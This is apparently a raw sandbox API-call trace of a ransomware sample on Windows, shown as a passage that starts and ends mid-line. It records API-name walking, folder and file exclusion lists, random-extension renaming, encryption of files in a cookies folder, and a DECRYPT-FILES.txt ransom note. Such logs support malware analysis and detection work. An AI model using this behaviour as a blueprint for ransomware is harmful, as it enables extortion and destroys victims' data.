lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0181.088] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0181.088] lstrcpyA (in: lpString1=0x36fce30, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0181.088] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0181.088] lstrcpyA (in: lpString1=0x36fce30, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0181.088] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0181.088] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0181.088] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0181.088] lstrcpyA (in: lpString1=0x36fce30, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0181.088] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0181.088] lstrcpyA (in: lpString1=0x36fce30, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0181.088] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0181.088] lstrcpyA (in: lpString1=0x36fce30, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0181.088] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0181.088] lstrcpyA (in: lpString1=0x36fce30, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0181.088] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0181.088] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0181.088] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0181.088] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0181.088] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0181.088] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0181.088] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0181.088] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0181.088] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0181.088] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0181.088] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0181.088] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0181.088] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0181.088] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0181.089] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0181.089] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0181.089] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0181.089] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0181.089] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0181.089] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0181.089] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0181.089] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0181.089] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0181.089] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat") returned 81 [0181.089] wsprintfW (in: param_1=0x36fdae8, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat.JTS4ejm") returned 89 [0181.089] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat.JTS4ejm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat.jts4ejm"), dwFlags=0x0) returned 1 [0181.090] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.090] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.090] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.090] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2bc9ae40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xabbb3f60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabbb3f60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 1 [0181.090] lstrcmpW (lpString1="Low", lpString2=".") returned 1 [0181.091] lstrcmpW (lpString1="Low", lpString2="..") returned 1 [0181.091] lstrcatW (in: lpString1="Low", lpString2="\\" | out: lpString1="Low\\") returned="Low\\" [0181.091] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpString2="Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0181.091] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpSrch="\\Program Files") returned 0x0 [0181.091] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpSrch=":\\Windows") returned 0x0 [0181.091] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpSrch="\\Games\\") returned 0x0 [0181.091] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpSrch="\\Tor Browser\\") returned 0x0 [0181.091] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpSrch="\\ProgramData\\") returned 0x0 [0181.091] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0181.091] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0181.091] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0181.091] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpSrch="\\All Users") returned 0x0 [0181.091] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpSrch="\\IETldCache\\") returned 0x0 [0181.091] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpSrch="\\Local Settings\\") returned 0x0 [0181.091] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpSrch="\\AppData\\Local") returned 0x0 [0181.091] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpSrch="AhnLab") returned 0x0 [0181.091] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0181.091] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0181.091] lstrlenW (lpString="0a16c9.tmp") returned 10 [0181.091] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\\\0a16c9.tmp") returned 87 [0181.091] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x27c [0181.094] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0181.094] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0181.094] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\\\DECRYPT-FILES.txt") returned 94 [0181.094] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0181.097] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0181.097] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\*" [0181.097] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\*", lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2bc9ae40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xef11a6a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xef11a6a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4799b8 [0181.098] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0181.098] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2bc9ae40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xef11a6a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xef11a6a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0181.099] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0181.099] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0181.099] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xef11a6a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xef11a6a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xef11a6a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0181.099] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0181.099] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0181.099] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0181.099] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0181.099] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0181.099] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0181.099] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0181.099] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0181.099] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0181.099] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0181.099] lstrlenW (lpString="0a16c9.tmp") returned 10 [0181.099] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0181.099] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0181.099] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0181.099] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0181.099] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0181.099] lstrlenW (lpString="0a16c9.tmp") returned 10 [0181.100] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0181.100] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\0a16c9.tmp" [0181.100] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0181.100] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0181.100] CloseHandle (hObject=0x0) returned 0 [0181.100] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.100] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x44eb6480, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x44eb6480, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0xab4dc020, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x16e, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt.QI6F", cAlternateFileName="5P5NRG~1.QI6")) returned 1 [0181.100] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt.QI6F", lpString2="DECRYPT-FILES.txt") returned -1 [0181.100] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt.QI6F", lpString2="autorun.inf") returned -1 [0181.100] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt.QI6F", lpString2="boot.ini") returned -1 [0181.100] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt.QI6F", lpString2="desktop.ini") returned -1 [0181.100] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt.QI6F", lpString2="ntuser.dat") returned -1 [0181.100] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt.QI6F", lpString2="iconcache.db") returned -1 [0181.100] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt.QI6F", lpString2="bootsect.bak") returned -1 [0181.101] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt.QI6F", lpString2="ntuser.dat.log") returned -1 [0181.101] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt.QI6F", lpString2="thumbs.db") returned -1 [0181.101] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt.QI6F", lpString2="Bootfont.bin") returned -1 [0181.101] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt.QI6F") returned 53 [0181.101] lstrcmpiW (lpString1="QI6F", lpString2="lnk") returned 1 [0181.101] lstrcmpiW (lpString1="QI6F", lpString2="exe") returned 1 [0181.101] lstrcmpiW (lpString1="QI6F", lpString2="sys") returned -1 [0181.101] lstrcmpiW (lpString1="QI6F", lpString2="dll") returned 1 [0181.101] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0181.101] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt.QI6F") returned 53 [0181.101] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0181.101] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt.QI6F" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt.QI6F") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt.QI6F" [0181.101] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0181.101] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt.QI6F" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt.qi6f"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0181.101] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=366) returned 1 [0181.101] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0181.102] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0181.102] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0181.102] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0181.102] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0181.102] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fd7a0*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fd7a0*=0x100) returned 1 [0181.103] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0181.103] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.103] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0181.103] CloseHandle (hObject=0x288) returned 1 [0181.103] SetFilePointerEx (in: hFile=0x284, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0181.103] WriteFile (in: hFile=0x284, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fd7c0, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fd7c0*=0x108, lpOverlapped=0x0) returned 1 [0181.104] CloseHandle (hObject=0x0) returned 0 [0181.104] CloseHandle (hObject=0x284) returned 1 [0181.105] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.105] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.105] GetTickCount () returned 0x1134b63 [0181.105] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0181.105] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0181.105] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0181.105] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0181.106] lstrlenA (lpString="kernel32.dll") returned 12 [0181.106] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0181.106] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0181.106] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0181.106] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0181.106] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0181.106] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0181.106] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0181.106] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0181.106] lstrlenA (lpString="ADDATOMA") returned 8 [0181.106] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0181.106] lstrlenA (lpString="ADDATOMW") returned 8 [0181.106] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0181.106] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0181.106] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0181.106] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0181.106] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0181.106] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0181.106] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0181.106] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0181.106] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0181.106] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0181.106] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0181.106] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0181.106] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0181.106] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0181.106] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0181.107] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0181.107] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0181.107] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0181.107] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") 